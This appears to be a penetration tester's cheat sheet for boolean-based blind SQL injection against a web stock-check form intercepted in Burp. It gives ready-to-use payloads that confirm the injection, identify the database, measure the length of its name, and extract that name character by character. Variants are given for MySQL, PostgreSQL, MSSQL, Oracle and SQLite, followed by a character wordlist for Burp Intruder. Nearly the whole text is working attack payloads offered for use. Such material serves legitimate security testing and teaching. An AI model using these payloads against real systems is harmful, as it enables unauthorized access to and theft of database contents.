Boolean-Based SQLi
Example 1
Application is a stock control program that shows a positive or negative value
Burp intercept shows POST request with this positive/negative value verifying if an item is in stock.
Testing this for SQLi, specifically a boolean true/false query:
Positive result:
search=iphone11' AND 1=1-- -
Negative result:
search=iphone11' AND 1=2-- -
Confirm mysql database type
search=iphone11' AND database()!=''-- -
Determine the length of the database with true/false values
search=iphone11' AND LENGTH(database())=10-- -
Extract the DB name char by char, use the burpsuite intruder for this.
search=iphone11'+AND+SUBSTRING(database(),1,1)%3d'a'--+-
If mysql:
AND SUBSTRING(database(),9,1)='R'-- -
AND MID(database(),9,1)='R'-- -
AND ASCII(SUBSTRING(database(),9,1))=82-- -
If PostgreSQL
AND SUBSTRING(current_database() FROM 9 FOR 1)='R'-- -
AND ASCII(SUBSTRING(current_database() FROM 9 FOR 1))=82-- -
If MSSQL
AND SUBSTRING(DB_NAME(),9,1)='R'-- -
AND ASCII(SUBSTRING(DB_NAME(),9,1))=82-- -
If Oracle
AND SUBSTR(SYS_CONTEXT('USERENV','DB_NAME'),9,1)='R'-- -
AND ASCII(SUBSTR(SYS_CONTEXT('USERENV','DB_NAME'),9,1))=82
If SQLIte
AND SUBSTR('main',9,1)='R'
Wordlists
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
!
_
__
___
@
## $
%
^
&
*
(
)
# _
[
]
{
}
;
:
'
"
,
.
<
/
?
\
|
~
`
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100